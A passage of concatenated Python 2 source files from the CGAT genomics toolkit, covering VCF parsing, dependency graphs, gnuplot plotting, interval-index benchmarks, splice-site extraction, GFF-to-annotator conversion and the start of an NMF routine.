"number of samples do not match: %i != %i" % (
len(order), len(self.samples))
outfile.write("\t".join(order))
else:
outfile.write("\t".join(self.samples))
outfile.write("\n")
def __iter__(self):
return self
def addMetaFromLine(self, line):
key, value = line.split("=", 1)
if key == "INFO":
data = value.split(",")
self.info[data[0]] = data[1:]
elif key == "FORMAT":
data = value.split(",")
self.format[data[0]] = data[1:]
elif key == "fileformat":
self.fileformat = value
def next(self):
data = self.line[:-1].split("\t")
self.line = self.infile.readline()
if not self.line:
raise StopIteration
return VCFEntry(data, self.samples)
if __name__ == "__main__":
inf = VCFFile(sys.stdin)
for x in inf:
print str(x)
```
#### File: cgat/dependency_graph/graph.py
```python
import sys
import os
from snakefood.depends import read_depends, eliminate_redundant_depends
prefix = '''
# This file was generated by sfood-graph.
strict digraph "dependencies" {
graph [
rankdir = "LR",
overlap = "scale",
size = "8,10",
ratio = "fill",
fontsize = "16",
fontname = "Helvetica",
clusterrank = "local"
]
node [
fontsize=%s
shape=ellipse
// style=filled
// shape=box
];
'''
postfix = '''
}
'''
COLORS = ["#999999", "#E69F00", "#56B4E9", "#009E73",
"#F0E442", "#0072B2", "#D55E00", "#CC79A7"]
def graph(pairs, write, fontsize, color_map):
"Given (from, to) pairs of (root, fn) files, output a dot graph."
write(prefix % fontsize)
for (froot, f), (troot, t) in pairs:
if opts.pythonify_filenames:
f = normpyfn(f)
t = normpyfn(t)
if opts.full_pathnames:
f = os.path.join(froot, f)
if troot:
t = os.path.join(troot, t)
if troot is None:
dn = os.path.dirname(f)
if dn not in color_map:
color_map[dn] = COLORS[len(color_map) % len(COLORS)]
write('"%s" [style=filled, color="%s"];\n' % (f, color_map[dn]))
else:
write('"%s" -> "%s";\n' % (f, t))
write(postfix)
def normpyfn(fn):
"Normalize the python filenames for output."
if fn is None:
return fn
if fn.endswith('.py'):
fn = fn[:-3]
fn = fn.replace(os.sep, '.')
return fn
def main():
import optparse
parser = optparse.OptionParser(__doc__.strip())
parser.add_option('-f', '--full-pathnames', '--full', action='store_true',
help="Output the full pathnames, not just the relative.")
parser.add_option('-p', '--pythonify-filenames', '--remove-extensions',
action='store_true',
help="Remove filename extensions in the graph and "
"replace slashes with dots.")
parser.add_option('-r', '--redundant', action='store_false', default=True,
help="Do not eliminate redundant dependencies.")
parser.add_option('--fontsize', action='store', type='int',
default=10,
help="The size of the font to use for nodes.")
global opts
opts, args = parser.parse_args()
if not args:
args = ['-']
color_map = {}
for fn in args:
if fn == '-':
f = sys.stdin
else:
f = open(fn)
depends = read_depends(f)
if opts.redundant:
depends = eliminate_redundant_depends(depends)
graph(depends, sys.stdout.write, opts.fontsize, color_map)
if __name__ == "__main__":
main()
```
#### File: cgat/legacy/gnuplot_data.py
```python
import sys, re, string, os, getopt, time, tempfile
USAGE = """python %s < stdin > stdout
plot a histogram (or a set of histograms).
-v, --verbose verbosity
-l, --legend set legend
-t, --title set title
-c, --hardcopy create hardcopy of picture
-w, --with with command to gnuplot (for example, "points")
-f, --fit do linear fit to data
-i, --files plot a set of files
-o, --logscale=# set logscale
-u, --function= plot a function
'#' at start of line is a comment
""" % sys.argv[0]
param_long_options = ["help", "verbose=", "legend=", "title=", "hardcopy=", "blackwhite", "with=", "fit", "files=",
"logscale=", "function="]
param_short_options = "hv:l:t:c:bw:fi:u:"
param_legend = None
param_title = None
param_hardcopy = None
param_blackwhite = None
param_terminal = "postscript"
param_with="points"
param_fit = None
param_logscale = None
param_filenames = None
param_function = None
import Experiment
import Histogram
import Gnuplot
def PlotFit( g, data, cols=(0,1) ):
fh1, fn1 = tempfile.mkstemp()
a,b = cols
os.close(fh1)
outfile = open(fn1, "w")
for d in data: outfile.write("%f\t%f\n" % (d[a], d[b]))
outfile.close()
parameters = {}
fh2, fn2 = tempfile.mkstemp()
fh3, fn3 = tempfile.mkstemp()
os.close(fh2)
os.close(fh3)
open(fn2, 'w').write('m=0\nb=0\n')
g("f%i(x) = m * x + y0" % b)
g("fit f%i(x) '%s' using 1:2 via y0, m" % (b, fn1))
g("replot f%i(x)" % (b))
## g('fit m*x+b "%s" via "%s"' % (fn1, fn2) )
## g('update "%s" "%s"' % (fn2, fn3))
## execfile( fn3, globals(), parameters )
## g.replot( Gnuplot.Func( "%f*x + %f" % (parameters['m'], parameters['b']) ) )
return [fn1, fn2, fn3]
def Fit( data, cols=(0,1) ):
import scipy.linalg
a,b = cols
matrix = []
imatrix = []
for d in data:
matrix.append([1.0, d[a]]) # for y = a + bx
imatrix.append([1.0, d[b]]) # for x = a + by
coeffs = scipy.linalg.lstsq(matrix, map(lambda x: x[b], data))[0]
icoeffs = scipy.linalg.lstsq(imatrix, map(lambda x: x[a], data))[0]
f = "%f + %f*x" % (coeffs[0], coeffs[1])
r2 = coeffs[1] * icoeffs[1]
return Gnuplot.Func( f, title="%s (r^2=%f)" % (f, r2))
##---------------------------------------------------------------------------------------------------------
if __name__ == '__main__':
try:
optlist, args = getopt.getopt(sys.argv[1:],
param_short_options,
param_long_options)
except getopt.error, msg:
print USAGE, msg
sys.exit(1)
for o,a in optlist:
if o in ("-l", "--legend"):
param_legend = string.split( a, "," )
elif o in ("-t", "--title"):
param_title = a
elif o in ("-c", "--hardcopy"):
param_hardcopy = a
if re.search( "\.png$", a):
param_terminal = "png"
elif o in ("-b", "--blackwhite"):
param_blackwhite = 1
elif o in ("-w", "--with"):
param_with = a
elif o in ("-f", "--fit"):
param_fit = 1
elif o in ("-u", "--function"):
param_function = string.split(a,",")
elif o in ("-i", "--files"):
param_filenames = string.split(a, ",")
elif o in ("-o", "--logscale"):
param_logscale = a
if len(args) > 0:
print USAGE, "no arguments needed."
sys.exit(1)
print Experiment.GetHeader()
print Experiment.GetParams()
if not param_hardcopy:
g = Gnuplot.Gnuplot(debug=1, persist=1)
else:
g = Gnuplot.Gnuplot(debug=1)
if param_filenames:
filenames = param_filenames
else:
filenames = ["-"]
if param_logscale:
g("set logscale %s" % param_logscale)
for filename in filenames:
if filename == "-":
lines = filter( lambda x: x[0] <> "#", sys.stdin.readlines())
else:
lines = filter( lambda x: x[0] <> "#", open(filename).readlines())
if param_legend:
data = map( lambda x: map(string.atof, string.split(x[:-1], "\t")), lines)
legend = [param_legend[0]] + param_legend[1:len(data[0])]
del param_legend[1:len(data[0])]
else:
legend = string.split(lines[0][:-1], "\t")
data = map( lambda x: map(string.atof, string.split(x[:-1], "\t")), lines[1:])
g.clear()
if param_title:
g.title( param_title )
g.xlabel( legend[0] )
for x in range(1, len(legend)):
g.replot( Gnuplot.Data( data, cols=(0, x),
xwith = param_with,
title =legend[x]) )
if param_fit:
g.replot(Fit( data, cols=(0,x)))
if param_function:
for f in param_function:
g.replot( Gnuplot.Func( f ) )
g.refresh()
if param_hardcopy:
g.hardcopy( param_hardcopy,
terminal = param_terminal )
## g.replot( Gnuplot.File( fn1,
## using="1:2",
## with = param_with,
## title=legend[x]) )
# print d.filename
## temps += PlotFit( g, data, cols=(0, x) )
# print d.filename
```
#### File: cgat/obsolete/adda2coverage.py
```python
import os
import sys
import re
import optparse
import CGAT.Experiment as E
def main( argv = None ):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv: argv = sys.argv
# setup command line parser
parser = E.OptionParser( version = "%prog version: $Id: adda2coverage.py 2781 2009-09-10 11:33:14Z andreas $", usage = globals()["__doc__"] )
parser.add_option("-f", "--filename-lengths", dest="filename_lengths", type="string",
help="filename with length information [default=%default]." )
parser.set_defaults(
filename_lengths = "test",
)
## add common options (-h/--help, ...) and parse command line
(options, args) = E.Start( parser, argv = argv )
map_id2length = {}
for line in open(options.filename_lengths, "r"):
if line.startswith("#"): continue
if line.startswith("id\t"): continue
id, length = line[:-1].split()[:2]
map_id2length[bytes(id)] = int(length)
E.info("read sequence length information for %i sequences" % len(map_id2length) )
## do sth
ninput, nskipped, noutput = 0, 0, 0
def iterator_domains( infile ):
last = None
for line in infile:
if line.startswith("#"): continue
if line.startswith("id\t"): continue
id, start, end, family = line[:-1].split()
if id != last:
if last: yield domains
domains = []
last = id
domains.append( (bytes(id), int(start), int(end), bytes(family) ) )
yield domains
options.stdout.write( "id\tcoverage\n" )
for domains in iterator_domains( options.stdin ):
ninput += 1
id = domains[0][0]
if id not in map_id2length:
nskipped += 1
E.warn( "length for sequence %s not known" % id )
continue
t = sum( [ x[2] - x[1] for x in domains ] )
options.stdout.write( "%s\t%5.2f\n" % (id, 100.0 * t / map_id2length[id] ) )
noutput += 1
E.info( "ninput=%i, noutput=%i, nskipped=%i" % (ninput, noutput,nskipped) )
## write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit( main( sys.argv) )
```
#### File: cgat/obsolete/benchmark_ranges.py
```python
import os, sys, re, optparse, timeit, random, time
import CGAT.NCL as ncl
try:
import rtree2
HAVE_RTREE = True
except ImportError, msg:
HAVE_RTREE = False
try:
import bx.intervals.io
import bx.intervals.intersection
HAVE_BX = True
except ImportError, msg:
HAVE_BX = False
try:
from bme10.fast import *
HAVE_BME = True
except ImportError, msg:
HAVE_BME = False
try:
import quicksect
HAVE_QUICKSECT = True
except ImportError, msg:
HAVE_QUICKSECT = False
import CGAT.Experiment as E
def generate_uniform_segments( workspace_size, segment_size, num_segments ):
"""generate a uniformly covering set of segments without overlap
If num_segments == 0, the segments are packed without gaps. Otherwise they are
uniformly distributed.
"""
if num_segments == 0:
for x in xrange( 0, workspace_size, segment_size):
yield (x, min(workspace_size,x+segment_size) )
else:
space = workspace_size - segment_size * num_segments
increment = space // num_segments
x = 0
for y in xrange( num_segments):
yield( x, min(workspace_size,x+segment_size) )
x += segment_size + increment
def generate_overlapping_segments( workspace_size, segment_size, num_segments ):
"""generate a covering set of segments with overlap
Generates a fully covering set of segments. A covering set of segments are built from segment_size.
Later, segments of twice the size are added overlapping the previous set, and so on until
the final segments covers the full workspace.
"""
s = segment_size
while s < workspace_size:
for x in xrange( 0, workspace_size, s):
yield (x, min(workspace_size,x+s) )
s *= 2
yield( 0, workspace_size )
def generate_random_segments( workspace_size, segment_size, num_segments ):
"""generate randomly positioned and sized segments."""
for x in range(num_segments):
start = random.randint( 0, workspace_size )
end = random.randint( start, workspace_size )
yield (start, end)
def sample_uniform_segments( workspace_size, segment_size ):
"""sample from a uniform set of covering segments without overlap
"""
starts = list(range( 0, workspace_size, segment_size))
random.shuffle( starts )
for x in starts:
yield (x, min(workspace_size,x+segment_size) )
def bx_create( segmenter ):
intersector = bx.intervals.intersection.Intersecter()
for start, end in segmenter:
intersector.add_interval( bx.intervals.Interval(start,end) )
return intersector
def bx_lookup( index, sampler ):
for start, end in sampler:
result = list(index.find( start, end ))
return result
def ncl_create( segmenter ):
index = ncl.IntervalDB()
index.fromlist( [ (coords[0],coords[1],id) for id,coords in enumerate( segmenter ) ] )
return index
def ncl_lookup( index, sampler ):
for start, end in sampler:
result = list(index.find_overlap( start, end ))
return result
def nclpy_create( segmenter ):
index = ncl.NCL()
for id,coords in enumerate( segmenter ): index.add( coords[0],coords[1],id )
return index
def nclpy_create_on_disk( segmenter ):
index = ncl.NCL( filestem = "tmp", force=True )
for id,coords in enumerate( segmenter ): index.add( coords[0],coords[1],id )
return index
def nclpy_create_on_disk_and_flush( segmenter ):
index = ncl.NCL( filestem = "tmp", force=True )
for id,coords in enumerate( segmenter ): index.add( coords[0],coords[1],id )
del index
return ncl.NCL( filestem = "tmp" )
def nclpy_lookup( index, sampler ):
for start, end in sampler:
result = list(index.find( start, end ))
return result
def bme_create( segmenter ):
index = GFile( [ Interval( "1", start, end) for start, end in segmenter],
header = {CHROM:0,START:1,END:2} )
return index
def bme_lookup( index, sampler ):
for start, end in sampler:
result = list(index.intersection( Interval( "1", start, end ) ))
return result
def quicksect_create( segmenter ):
IntervalNode = quicksect.IntervalNode
Feature = quicksect.Feature
x = segmenter.next()
index = IntervalNode( Feature( x[0], x[1]) )
for start, end in segmenter:
index = index.insert( Feature( start, end) )
return index
def quicksect_lookup( index, sampler ):
for start, end in sampler:
result = list(index.find( start, end ) )
return result
class RTreeIndex:
def __init__( self ):
self.index = rtree.Rtree()
def add( self, x, start, end ):
self.index.add(x, (start, 0, end-1, 0))
def find( self, start, end ):
return self.index.intersection( (start, 0, end-1,0) )
def rtree_create( segmenter ):
index = rtree.Rtree()
x = 0
for start, end in segmenter:
x += 1
index.add(x, (start, 0, end-1, 0) )
return index
def rtree_lookup( index, sampler ):
for start, end in sampler:
result = list(index.intersection( (start, 0, end-1,0) ))
return result
def rtree2_create( segmenter ):
index = RTreeIndex()
x = 0
for start, end in segmenter:
x += 1
index.add(x, start, end )
return index
def rtree2_lookup( index, sampler ):
for start, end in sampler:
result = list(index.find( start, end) )
return result
def main( argv = None ):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv: argv = sys.argv
# setup command line parser
parser = E.OptionParser( version = "%prog version: $Id$", usage = globals()["__doc__"] )
parser.add_option( "--segments", dest="segment_function", type="choice",
choices=("uniform", "overlapping", "random", ),
help="segment layout [default=%default]." )
parser.set_defaults(
workspace_size = 10000000,
segment_size = 1000,
segment_sizes = (10, 100, 1000),
num_segments = (10, 100, 1000, 10000),
verify = False,
segment_function = "uniform",
)
## add common options (-h/--help, ...) and parse command line
(options, args) = E.Start( parser )
pairs = [
("ncl:lowlevel-api", ncl_create, ncl_lookup),
("ncl:memory", nclpy_create, nclpy_lookup),
("ncl:disk:create", nclpy_create_on_disk, nclpy_lookup),
# ("nclpy:disk:use", nclpy_create_on_disk_and_flush, nclpy_lookup),
]
if HAVE_BME:
pairs.append( ("bme:memory", bme_create, bme_lookup), )
if HAVE_RTREE:
pairs.extend( [
("rtree", rtree_create, rtree_lookup),
("rtree wrapper", rtree2_create, rtree2_lookup), ] )
if HAVE_BX:
pairs.append( ("python.bx", bx_create, bx_lookup) )
if HAVE_QUICKSECT:
pairs.append( ("quicksect", quicksect_create, quicksect_lookup) )
# pairs = ( ("quicksect", quicksect_create, quicksect_lookup), )
# options.num_segments = [0]
segment_function = { "uniform" : generate_uniform_segments,
"overlapping" : generate_overlapping_segments,
"random" : generate_random_segments,
}[options.segment_function]
if options.verify:
for segment_size in options.segment_sizes:
segmenter = segment_function( options.workspace_size, segment_size, num_segments )
sampler = sample_uniform_segments( options.workspace_size, segment_size )
segments = list( segmenter)
indices = []
for name, create, lookup in pairs:
indices.append( create( segments ) )
for start,end in sampler:
for index, v in zip( indices, pairs):
name, create, lookup = v
intervals = list(lookup( index, ((start,end),) ))
print name, intervals
else:
sys.stdout.write("name\tsize\tnsegs\ttcreate\ttlookup\n" )
for num_segments in options.num_segments:
for segment_size in options.segment_sizes:
for name, create, lookup in pairs:
segmenter = segment_function( options.workspace_size, segment_size, num_segments )
sampler = sample_uniform_segments( options.workspace_size, segment_size )
t0 = time.time()
index = create(segmenter)
t1 = time.time()
lookup( index, sampler )
t2 = time.time()
sys.stdout.write( "%s\t%i\t%i\t%f\t%f\n" % (name, segment_size, num_segments, t1-t0, t2-t1 ) )
E.Stop()
if __name__ == "__main__":
sys.exit( main( sys.argv) )
```
#### File: cgat/obsolete/Dots.py
```python
import string
import alignlib
def ReadFromFile( file, min_dot_score = 0 ):
"""read dots from a file.
"""
dots_list = file.readlines()
dots = alignlib.makeAlignataMatrixRow()
max_row = 0
max_col = 0
has_prefix = None
checked_prefix = None
for dot in dots_list:
if dot == "\n": continue
if dot[0] == "#": continue
if dot[0] == "d": continue
data = string.split(dot, "\t")
if len(data) < 2: raise "parsing error in line", dot
if not checked_prefix:
if string.find(data[0], "-"): has_prefix = 1
checked_prefix = 1
row, col = data[:2]
if has_prefix:
row=string.split(row, "-")[1]
col=string.split(col, "-")[1]
row = string.atoi(row)
col = string.atoi(col)
if len(data) >= 3:
score = string.atof( data[2] )
if score < min_dot_score:
continue
else:
score = 0
max_row = max( max_row, row)
max_col = max( max_col, col)
dots.addPairExplicit( row, col, score)
return max_row, max_col, dots
```
#### File: cgat/obsolete/fasta2spliced.py
```python
import sys
import string
import re
import optparse
import CGAT.Experiment as E
import CGAT.IndexedFasta as IndexedFasta
import CGAT.Genomics as Genomics
if __name__ == "__main__":
parser = E.OptionParser( version = "%prog version: $Id: fasta2spliced.py 2861 2010-02-23 17:36:32Z andreas $")
parser.add_option("-g", "--genome-file", dest="genome_file", type="string",
help="filename with genome." )
parser.add_option("-r", "--filename-regions", dest="filename_regions", type="string",
help="filename with region information in GFF format." )
parser.add_option( "-p", "--output-filename-pattern", dest="output_filename_pattern", type="string" ,
help="OUTPUT filename pattern for additional data [%default].")
parser.add_option( "--joined", dest="joined", action="store_true",
help="output mode. If joined, all is output in one big chromosome. Otherwise, each are single fragments [%default].")
parser.add_option( "--only-first", dest="only_first", action="store_true",
help="only output the first possible splice site [%default].")
parser.set_defaults(
genome_file = "genome",
filename_regions = None,
output_format = "%08i",
output_filename_pattern = "%s",
methods = [],
splice_pairs = ( ("GT", "AG"), ),
min_intron_size = 30,
max_intron_size = 25000,
search_area = 5, # 10
read_length = 32,
only_first = False,
joined = False,
max_join_length = 1000000, # 100000000
format_id = "seg%05i",
)
(options, args) = E.Start( parser )
genome = IndexedFasta.IndexedFasta( options.genome_file )
assert options.filename_regions != None, "please supply a gff formatted filename with regions"
regions = GTF.readAsIntervals( GFF.iterator( IOTools.openFile(options.filename_regions, "r" ) ) )
# build pairs for complement
reverse_splice_pairs = []
forward_splice_pairs = options.splice_pairs
left_tokens, right_tokens = {}, {}
x = 0
for a,b in forward_splice_pairs:
assert len(a) == 2, "only two-residue patterns allowed"
assert len(b) == 2, "only two-residue patterns allowed"
ca, cb = Genomics.complement( a ), Genomics.complement( b )
reverse_splice_pairs.append( (b,a) )
left_tokens[a] = x
left_tokens[cb] = x+1
right_tokens[b] = x
right_tokens[ca] = x+1
x += 2
search_area = options.search_area
read_length = options.read_length
joined = options.joined
ninput, noutput = 0, 0
if joined:
outfile_coordinates = IOTools.openFile( options.output_filename_pattern % "coords", "w" )
outfile_coordinates.write( "segment\tpos\tcontig\t5start\t3start\n" )
out_contig = 1
options.stdout.write( ">%s\n" % (options.format_id % out_contig ))
nbases = 0
separator = "N" * read_length
lseparator = len(separator)
contig_sizes = genome.getContigSizes()
# collect possible start/end points of introns
for contig, lcontig in contig_sizes.items():
ninput += 1
nintrons = 0
if contig not in regions:
E.debug( "skipped %s - no intervals defined" % (contig))
continue
sequence = genome.getSequence( contig, as_array = True )
E.debug( "processing %s of length %i" % (contig, len(sequence)))
regions[contig].sort()
left_positions, right_positions = [], []
def addPositions( start, end, tokens, positions, forward = True, first = False ):
area = sequence[start:end].upper()
if forward:
for x in range(len(area)-1):
t = area[x:x+2]
if t in tokens:
positions.append( (start+x,tokens[t] ) )
if first: return True
else:
for x in range(len(area)-2,-1,-1):
t = area[x:x+2]
if t in tokens:
positions.append( (start+x,tokens[t] ) )
if first: return True
return False
intron_start = regions[contig][0][1]
for exon_start,exon_end in regions[contig][1:]:
intron_end = exon_start
if options.only_first:
if not addPositions( intron_start, intron_start+search_area, left_tokens, left_positions, forward=True, first = True ):
addPositions( intron_start-search_area, intron_start, left_tokens, left_positions, forward=False, first = True )
if not addPositions( intron_end-search_area, intron_end, right_tokens, right_positions, forward=False, first = True ):
addPositions( intron_end, intron_end+search_area, right_tokens, right_positions, forward=True, first = True )
else:
addPositions( intron_start-search_area, intron_start+search_area, left_tokens, left_positions, forward=True, first = False )
addPositions( intron_end-search_area, intron_end+search_area, right_tokens, right_positions, forward=True, first = False )
intron_start = exon_end
E.debug("%s: left=%i, right=%i" % (contig, len(left_positions), len(right_positions) ))
# build possible introns
#
# iterate over left positions and collect right positions within a radius
# given by min_intron_size and max_intron_size.
# left_positions and right_positions are sorted
ri, mr = 0, len(right_positions)
for l,t in left_positions:
lower_bound, upper_bound = l + options.min_intron_size, l + options.max_intron_size
while ri < mr and right_positions[ri][0] < lower_bound: ri += 1
rri = ri
while rri < mr and right_positions[rri][0] < upper_bound:
if right_positions[rri][1] == t:
# positions are start/end of splice motif
# so add two on the right side
r = right_positions[rri][0]+2
lmin = max(0, l-read_length )
rmax = min( lcontig, r + read_length )
if options.loglevel >= 3:
options.stdlog.write("# adding intron on %s: l=%i, r=%i, t=%i, %s %s %s %s\n" %\
(contig, l, r, t,
sequence[lmin:l],
sequence[l:l+2],
sequence[r-2:r],
sequence[r:rmax] ) )
if joined:
outfile_coordinates.write("%s\t%i\t%s\t%i\t%i\n" % (options.format_id % out_contig, nbases, contig, lmin, r ) )
s = sequence[lmin:l] + sequence[r:rmax]
options.stdout.write( "%s\n%s\n" % (s, separator ) )
nbases += len(s) + lseparator
if nbases > options.max_join_length:
nbases = 0
out_contig += 1
options.stdout.write( ">%s\n" % (options.format_id % out_contig ) )
else:
options.stdout.write( ">%s_%i_%i\n%s%s\n" % (contig, lmin, r,
sequence[lmin:l],
sequence[r:rmax] ) )
nintrons += 1
noutput += 1
rri += 1
E.info( "contig %s: %i introns" % (contig, nintrons))
E.info( "ninput=%i, noutput=%i" % (ninput, noutput) )
E.Stop()
```
#### File: cgat/obsolete/gff2annotator.py
```python
import sys
import string
import re
import optparse
import time
import os
import shutil
import tempfile
import math
import itertools
import glob
import collections
import CGAT.Experiment as E
import CGAT.GTF as GTF
import CGAT.IndexedFasta as IndexedFasta
import CGAT.IOTools as IOTools
import CGATPipelines.PipelineEnrichment as PipelineEnrichment
USAGE = """python %s [OPTIONS] < stdin > stdout
convert a gff file into annotator compatible regions. Depending on the option --section
this script will create:
segments
a segments file
annotations
a file with annotations. Multiple gff files can be provided.
annotations-genes
if gtf files are provided (ending in .gtf), multiple subsets can be created using the
--subsets options. In this case a list of gene_ids for each subset is required.
annotations-go
a file with annotations. Input is a gtf file and a map of gene identifiers
to categories. Requires --input-filename-map.
annotations-gff
take all annotations in a gff file and create individual annotations for each feature
encountered. Multiple files will be aggregated if they contain the same feature.
workspace
a file with a workspace
""" % sys.argv[0]
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser = E.OptionParser(
version="%prog version: $Id: gff2annotator2tsv.py 2861 2010-02-23 17:36:32Z andreas $", usage=globals()["__doc__"])
parser.add_option("-g", "--genome-file", dest="genome_file", type="string",
help="filename with genome.")
parser.add_option("-f", "--features", dest="features", type="string",
help="feature to collect [default=None].")
parser.add_option("-i", "--files", dest="files", action="append",
help="use multiple annotations [default=None].")
parser.add_option("-a", "--annotations", dest="annotations", type="string",
help="aggregate name for annotations if only single file is provided from STDIN [default=None].")
parser.add_option("--input-filename-map", dest="input_filename_map", type="string",
help="filename with a map of gene_ids to categories [default=None].")
parser.add_option("--output-filename-synonyms", dest="output_filename_synonyms", type="string",
help="output filename for synonyms. For workspace building, the gff source will be used as the id (instead of the contig) [default=None].")
parser.add_option("-m", "--max-length", dest="max_length", type="string",
help="maximum segment length [default=None].")
parser.add_option("-s", "--section", dest="section", type="choice",
choices=("segments", "annotations", "annotations-genes",
"annotations-go", "workspace", "annotations-gff"),
help="annotator section [default=None].")
parser.add_option("--subset", dest="subsets", type="string", action="append",
help="add filenames to delimit subsets within the gff files. The syntax is filename.gff,label,filename.ids [default=None].")
parser.add_option("--remove-regex", dest="remove_regex", type="string",
help="regular expression of contigs to remove [default=None].")
parser.set_defaults(
genome_file=None,
feature=None,
section="segments",
annotations="annotations",
max_length=100000,
files=[],
subsets=[],
input_filename_map=None,
output_filename_synonyms=None,
input_format="gff",
remove_regex=None,
)
(options, args) = E.Start(parser)
options.files += args
if len(options.files) == 0:
options.files.append("-")
options.files = list(
itertools.chain(*[re.split("[,; ]+", x) for x in options.files]))
if options.subsets:
subsets = collections.defaultdict(list)
for s in options.subsets:
filename_gff, label, filename_ids = s.split(",")
subsets[filename_gff].append((label, filename_ids))
options.subsets = subsets
if options.genome_file:
fasta = IndexedFasta.IndexedFasta(options.genome_file)
else:
fasta = None
if options.section == "segments":
prefix = "##Segs"
elif options.section.startswith("annotations"):
prefix = "##Id"
elif options.section == "workspace":
prefix = "##Work"
else:
raise ValueError("unknown section %s" % options.section)
ninput, ncontigs, nsegments, ndiscarded = 0, 0, 0, 0
if options.remove_regex:
options.remove_regex = re.compile(options.remove_regex)
if options.section in ("segments", "workspace"):
iterator = GTF.iterator_filtered(GFF.iterator(options.stdin),
feature=options.feature)
if options.output_filename_synonyms:
outfile_synonyms = open(options.output_filename_synonyms, "w")
with_records = True
else:
outfile_synonyms = None
with_records = False
intervals = GTF.readAsIntervals(iterator, with_records=with_records)
ninput, nsegments, ndiscarded, ncontigs = \
PipelineEnrichment.outputSegments(options.stdout,
intervals,
options.section,
outfile_synonyms=outfile_synonyms,
max_length=options.max_length,
remove_regex=options.remove_regex)
if outfile_synonyms:
outfile_synonyms.close()
elif options.section == "annotations-go":
assert options.input_filename_map, "please supply option --input-filename-map"
iterator = GTF.iterator_filtered(GTF.iterator(options.stdin),
feature=options.feature)
geneid2categories = IOTools.readMultiMap(
open(options.input_filename_map, "r"))
category2segments = collections.defaultdict(list)
for contig, gffs in GTF.readAsIntervals(iterator, with_gene_id=True).items():
if options.remove_regex and options.remove_regex.search(contig):
continue
for start, end, geneid in gffs:
if geneid not in geneid2categories:
continue
for category in geneid2categories[geneid]:
category2segments[category].append(nsegments)
options.stdout.write(
"%s\t%i\t%s\t(%i,%i)\n" % (prefix, nsegments, contig, start, end))
nsegments += 1
for category, segments in category2segments.iteritems():
options.stdout.write(
"##Ann\t%s\t%s\n" % (category, "\t".join(["%i" % x for x in segments])))
E.info("set %s annotated with %i segments" %
(category, len(segments)))
elif options.section == "annotations":
for filename in options.files:
E.info("adding filename %s" % filename)
start = nsegments
is_gtf = False
if filename == "-":
iterator = GTF.iterator_filtered(GFF.iterator(sys.stdin),
feature=options.feature)
filename = options.annotations
elif filename.endswith(".gtf"):
is_gtf = True
with open(filename, "r") as infile:
iterator = GTF.iterator_filtered(GTF.iterator(infile),
feature=options.feature)
else:
with open(filename, "r") as infile:
iterator = GTF.iterator_filtered(GFF.iterator(infile),
feature=options.feature)
E.debug("processing %s" % (filename))
if not options.subsets or filename not in options.subsets:
for contig, gffs in GTF.readAsIntervals(iterator).items():
if options.remove_regex and options.remove_regex.search(contig):
continue
for x in gffs:
options.stdout.write(
"%s\t%i\t%s\t(%i,%i)\n" % (prefix, nsegments, contig, x[0], x[1]))
nsegments += 1
options.stdout.write("##Ann\t%s\t%s\n" % (
filename, "\t".join(["%i" % x for x in range(start, nsegments)])))
E.info("set %s annotated with %i segments" %
(filename, nsegments - start))
else:
raise ValueError("don't know how to filter %s" % filename)
elif options.section == "annotations-gff":
for filename in options.files:
if filename == "-":
iterator = GTF.iterator(sys.stdin)
else:
iterator = GTF.iterator_filtered(
GFF.iterator(open(filename, "r")))
segments = collections.defaultdict(list)
for gff in iterator:
segments[":".join((gff.source, gff.feature))].append(
(gff.contig, gff.start, gff.end))
feature2segments = {}
for feature, s in segments.iteritems():
s.sort()
s1 = nsegments
for contig, start, end in s:
if options.remove_regex and options.remove_regex.search(contig):
continue
options.stdout.write(
"%s\t%i\t%s\t(%i,%i)\n" % (prefix, nsegments, contig, start, end))
nsegments += 1
feature2segments[feature] = (s1, nsegments)
for feature, id_range in feature2segments.iteritems():
start, end = id_range
options.stdout.write("##Ann\t%s\t%s\n" % (
feature, "\t".join(["%i" % x for x in xrange(start, end)])))
E.info("set %s annotated with %i segments" %
(feature, end - start))
elif options.section == "annotations-genes":
for filename in options.files:
E.info("adding filename %s" % filename)
start = nsegments
assert filename.endswith(".gtf") or filename.endswith(".gtf.gz"), \
"requiring .gtf files for gene list filtering, received %s" % filename
infile = IOTools.openFile(filename)
iterator = GTF.iterator_filtered(GTF.iterator(infile),
feature=options.feature)
E.debug("processing %s" % (filename))
if not options.subsets or filename not in options.subsets:
# output all
for contig, gffs in GTF.readAsIntervals(iterator).items():
if options.remove_regex and options.remove_regex.search(contig):
continue
for x in gffs:
options.stdout.write(
"%s\t%i\t%s\t(%i,%i)\n" % (prefix, nsegments, contig, x[0], x[1]))
nsegments += 1
options.stdout.write("##Ann\t%s\t%s\n" % (
filename, "\t".join(["%i" % x for x in range(start, nsegments)])))
E.info("set %s annotated with %i segments" %
(filename, nsegments - start))
else:
# create subsets
E.debug("applying subsets for %s" % filename)
geneid2label, label2segments = collections.defaultdict(
list), {}
for label, filename_ids in options.subsets[filename]:
gene_ids = IOTools.readList(open(filename_ids, "r"))
for gene_id in gene_ids:
geneid2label[gene_id].append(label)
label2segments[label] = []
for contig, gffs in GTF.readAsIntervals(iterator, with_gene_id=True).items():
if options.remove_regex and options.remove_regex.search(contig):
continue
for start, end, gene_id in gffs:
if gene_id not in geneid2label:
continue
for label in geneid2label[gene_id]:
label2segments[label].append(nsegments)
options.stdout.write(
"%s\t%i\t%s\t(%i,%i)\n" % (prefix, nsegments, contig, start, end))
nsegments += 1
for label, segments in label2segments.iteritems():
options.stdout.write(
"##Ann\t%s\t%s\n" % (label, "\t".join(["%i" % x for x in segments])))
E.info("set %s (%s) annotated with %i segments" %
(label, filename, len(segments)))
E.info("ninput=%i, ncontigs=%i, nsegments=%i, ndiscarded=%i" %
(ninput, ncontigs, nsegments, ndiscarded))
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/obsolete/NMF.py
```python
from numpy import *
from numpy.linalg import norm
from time import time
def nmf(V, Winit, Hinit, tol, timelimit, maxiter, log=None):
"""
(c,W,H) = nmf(V,Winit,Hinit,tol,timelimit,maxiter)
W,H: output solution
c: output flag to indicate convergence
Winit,Hinit: initial solution
tol: tolerance for a relative stopping condition
timelimit, maxiter: limit of time and iterations
log: logfile
"""
W = Winit
H = Hinit
initt = time()
gradW = dot(W, dot(H, H.T)) - dot(V, H.T)
